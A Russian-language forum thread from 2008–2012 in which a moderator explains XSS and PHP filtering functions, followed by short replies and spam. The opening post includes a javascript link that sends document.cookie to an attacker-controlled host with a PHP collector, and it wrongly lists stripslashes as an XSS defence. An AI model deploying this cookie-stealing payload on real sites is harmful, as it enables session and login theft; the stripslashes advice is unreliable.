Здравствуйте Гость ( Вход | Регистрация ) | Выслать повторно письмо для активации |
Shock |
Отправлено: Nov 20 2008, 08:53 PM
|
Команда ЭйсВэб Группа: Super moderator Сообщений: 612 Пользователь №: 1704 Регистрация: 16-July 08 |
Все сайты имеют страницы с GET-запросами. К примеру, http://site.ru/?get=1. Так что же такое xss? XSS(Межсайтовый скриптинг)-это уязвимости, которые возникают при недостаточной обработке входящих данных. Обьясню на примере:
У нас есть URL: http://site.ru/?get=1. Чтобы увидеть, есть ли на даной странице xss-уязвимость нужно ввести следующий URL: http://site.ru?get=<script>alert(”Haha! XSS!!!”)</script> Если GET-запрос не защищен (об этом позже), от нам выскочит окошко с контентом Haha! XSS!!!. С помощью этих запросов мы можем украсть кукисы (cookie, логины, пароли и т.д.). Наиболее эфективнее применять xss-атаки в форумах, гостевых, комментариях. К примеру, если мы поместим на форуме такую ссылку (тут уже ваша фантазия): <a href="javascript:location.href='http://mysitewithhack.com/hack.php?cookies='+document.cookie">Супер музыка</a>, то мы увидим, что на странице hack.php (если она содержит к примеру следующий код:<?php echo $_GET['cookies']; ?>) отображено что то типа SESSID=4516316547546&log=admin&pass=1254. Вот и вся философия) Мы внимательно ознакомились с таким видом атак, как XSS. И каждый из нас не хотел бы оказаться жертвой даной атаки. Для защиты своего скрипта существует несколько функций PHP: 1.strip_tags(string) - Возвращает строку, при этом вырезая все теги HTML и PHP. Пример: <?php $var=strip_tags("<script>alert('')</script>"); ?> Функция возвратит в переменную var значение alert(”). 2.htmlspecialchars(string) - Заменяет все теги HTML аналогичными сивмолами. Пример: <?php $var=htmlspecialchars("<script>alert('')</script>"); ?> 3.stripslashes(string) - уберает обратные слеши. Пример: <?php $var=stripslashes("<script>alert('')</script>"); ?> Ну вот и все. Удачи на практике! -------------------- |
Wanted |
Отправлено: Nov 28 2008, 12:09 AM
|
Генерал Группа: Members Сообщений: 245 Пользователь №: 1942 Регистрация: 15-October 08 |
wiki.webprotection.ru/index.php/XSS
-------------------- 98% ошибок системы находятся в полуметре от монитора.... |
Applefun |
Отправлено: Sep 1 2011, 11:07 PM
|
Солдат Группа: unior Сообщений: 2 Пользователь №: 3973 Регистрация: 1-September 11 |
В логах апача постоянно сыплются логи url'oв типа http://site.ru?get=<script>alert(”Haha! XSS!!!”)</script>, хотя защита от xss в порядке.
-------------------- |
Ivan663 |
Отправлено: Nov 11 2011, 11:04 PM
|
Майор Группа: Members Сообщений: 111 Пользователь №: 3977 Регистрация: 3-September 11 |
это и есть дыры
-------------------- Скачать танки онлайн кристаллы бесплатно Скачать бесплатно читы на танки онлайн и новые коды на танки онлайн |
Shavron |
Отправлено: Mar 26 2012, 07:44 AM
|
Солдат Группа: unior Сообщений: 2 Пользователь №: 4213 Регистрация: 26-March 12 |
Можно с помощью XSS утащить куки от сторонних сайтов?
|